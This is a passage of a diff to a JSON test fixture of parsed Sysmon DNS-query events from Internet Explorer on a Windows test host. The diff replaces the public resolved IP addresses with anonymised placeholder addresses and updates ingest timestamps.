"192.26.92.30", + "data": "192.168.92.30", "type": "A" }, { @@ -14173,7 +14011,7 @@ "type": "AAAA" }, { - "data": "192.31.80.30", + "data": "192.168.80.30", "type": "A" }, { @@ -14181,21 +14019,21 @@ "type": "AAAA" }, { - "data": "192.12.94.30", + "data": "192.168.94.30", "type": "A" } ], "resolved_ip": [ - "199.166.0.200", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30" + "192.168.94.30" ] }, "network": { @@ -14211,22 +14049,22 @@ "sc.iasds01.com" ], "ip": [ - "199.166.0.200", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30" + "192.168.94.30" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313918221Z", + "ingested": "2021-12-09T13:49:44.739773800Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.836626600Z'/\u003e\u003cEventRecordID\u003e161\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.621\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003esc.iasds01.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 anycast.sc.iasds01.com;::ffff:199.166.0.200;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.836626600Z'/\u003e\u003cEventRecordID\u003e161\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.621\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003esc.iasds01.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 anycast.sc.iasds01.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:04.836Z", @@ -14290,11 +14128,11 @@ "type": "CNAME" }, { - "data": "104.244.38.20", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -14302,7 +14140,7 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" }, { @@ -14310,7 +14148,7 @@ "type": "AAAA" }, { - "data": "192.26.92.30", + "data": "192.168.92.30", "type": "A" }, { @@ -14318,7 +14156,7 @@ "type": "AAAA" }, { - "data": "192.31.80.30", + "data": "192.168.80.30", "type": "A" }, { @@ -14326,21 +14164,21 @@ "type": "AAAA" }, { - "data": "192.12.94.30", + "data": "192.168.94.30", "type": "A" } ], "resolved_ip": [ - "104.244.38.20", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30" + "192.168.94.30" ] }, "network": { @@ -14356,22 +14194,22 @@ "dt.adsafeprotected.com" ], "ip": [ - "104.244.38.20", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30" + "192.168.94.30" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313919537Z", + "ingested": "2021-12-09T13:49:44.739779500Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:05.034646400Z'/\u003e\u003cEventRecordID\u003e162\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.822\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003edt.adsafeprotected.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 sjedt.adsafeprotected.com;::ffff:104.244.38.20;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:05.034646400Z'/\u003e\u003cEventRecordID\u003e162\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.822\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003edt.adsafeprotected.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 sjedt.adsafeprotected.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:05.034Z", @@ -14439,12 +14277,12 @@ "type": "CNAME" }, { - "data": "72.21.91.29", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "72.21.91.29" + "89.160.20.156" ] }, "network": { @@ -14461,13 +14299,13 @@ "status.thawte.com" ], "ip": [ - "72.21.91.29" + "89.160.20.156" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313920911Z", + "ingested": "2021-12-09T13:49:44.739785400Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:05.034657300Z'/\u003e\u003cEventRecordID\u003e163\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.822\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003estatus.thawte.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 ocsp.digicert.com;type: 5 cs9.wac.phicdn.net;::ffff:72.21.91.29;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:05.034657300Z'/\u003e\u003cEventRecordID\u003e163\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.822\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003estatus.thawte.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 ocsp.digicert.com;type: 5 cs9.wac.phicdn.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:05.034Z", @@ -14546,47 +14384,47 @@ "type": "CNAME" }, { - "data": "38.134.110.101", + "data": "89.160.20.156", "type": "A" }, { - "data": "38.134.110.143", + "data": "89.160.20.156", "type": "A" }, { - "data": "38.134.110.141", + "data": "89.160.20.156", "type": "A" }, { - "data": "38.134.110.171", + "data": "89.160.20.156", "type": "A" }, { - "data": "38.134.110.177", + "data": "89.160.20.156", "type": "A" }, { - "data": "38.134.110.115", + "data": "89.160.20.156", "type": "A" }, { - "data": "38.134.110.104", + "data": "89.160.20.156", "type": "A" }, { - "data": "38.134.110.114", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "38.134.110.101", - "38.134.110.143", - "38.134.110.141", - "38.134.110.171", - "38.134.110.177", - "38.134.110.115", - "38.134.110.104", - "38.134.110.114" + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156" ] }, "network": { @@ -14604,20 +14442,13 @@ "ads.stickyadstv.com" ], "ip": [ - "38.134.110.101", - "38.134.110.143", - "38.134.110.141", - "38.134.110.171", - "38.134.110.177", - "38.134.110.115", - "38.134.110.104", - "38.134.110.114" + "89.160.20.156" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313922437Z", + "ingested": "2021-12-09T13:49:44.739790Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:05.034798300Z'/\u003e\u003cEventRecordID\u003e164\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.860\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eads.stickyadstv.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 ip1.ads.stickyadstv.com.akadns.net;type: 5 wlb1.ads.stickyadstv.com.akadns.net;type: 5 fp4.ads.stickyadstv.com.akadns.net;::ffff:38.134.110.101;::ffff:38.134.110.143;::ffff:38.134.110.141;::ffff:38.134.110.171;::ffff:38.134.110.177;::ffff:38.134.110.115;::ffff:38.134.110.104;::ffff:38.134.110.114;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:05.034798300Z'/\u003e\u003cEventRecordID\u003e164\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.860\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eads.stickyadstv.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 ip1.ads.stickyadstv.com.akadns.net;type: 5 wlb1.ads.stickyadstv.com.akadns.net;type: 5 fp4.ads.stickyadstv.com.akadns.net;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:05.034Z", @@ -14685,12 +14516,12 @@ "type": "CNAME" }, { - "data": "23.52.167.93", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "23.52.167.93" + "89.160.20.156" ] }, "network": { @@ -14707,13 +14538,13 @@ "hbx.media.net" ], "ip": [ - "23.52.167.93" + "89.160.20.156" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313923847Z", + "ingested": "2021-12-09T13:49:44.739793300Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:06.051692700Z'/\u003e\u003cEventRecordID\u003e165\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.904\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ehbx.media.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 hbx.media.net.edgekey.net;type: 5 e607.d.akamaiedge.net;::ffff:23.52.167.93;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:06.051692700Z'/\u003e\u003cEventRecordID\u003e165\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.904\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ehbx.media.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 hbx.media.net.edgekey.net;type: 5 e607.d.akamaiedge.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:06.051Z", @@ -14777,27 +14608,27 @@ "type": "CNAME" }, { - "data": "151.101.194.49", + "data": "89.160.20.156", "type": "A" }, { - "data": "151.101.2.49", + "data": "89.160.20.156", "type": "A" }, { - "data": "151.101.66.49", + "data": "89.160.20.156", "type": "A" }, { - "data": "151.101.130.49", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "151.101.194.49", - "151.101.2.49", - "151.101.66.49", - "151.101.130.49" + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156" ] }, "network": { @@ -14813,16 +14644,13 @@ "match.taboola.com" ], "ip": [ - "151.101.194.49", - "151.101.2.49", - "151.101.66.49", - "151.101.130.49" + "89.160.20.156" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313925047Z", + "ingested": "2021-12-09T13:49:44.739798Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:06.051710000Z'/\u003e\u003cEventRecordID\u003e166\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.911\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ematch.taboola.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 trc.taboola.map.fastly.net;::ffff:151.101.194.49;::ffff:151.101.2.49;::ffff:151.101.66.49;::ffff:151.101.130.49;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:06.051710000Z'/\u003e\u003cEventRecordID\u003e166\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.911\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ematch.taboola.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 trc.taboola.map.fastly.net;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:06.051Z", @@ -14886,17 +14714,17 @@ "type": "CNAME" }, { - "data": "23.50.53.185", + "data": "89.160.20.156", "type": "A" }, { - "data": "23.50.53.194", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "23.50.53.185", - "23.50.53.194" + "89.160.20.156", + "89.160.20.156" ] }, "network": { @@ -14912,14 +14740,13 @@ "img-s-msn-com.akamaized.net" ], "ip": [ - "23.50.53.185", - "23.50.53.194" + "89.160.20.156" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313927154Z", + "ingested": "2021-12-09T13:49:44.739802900Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 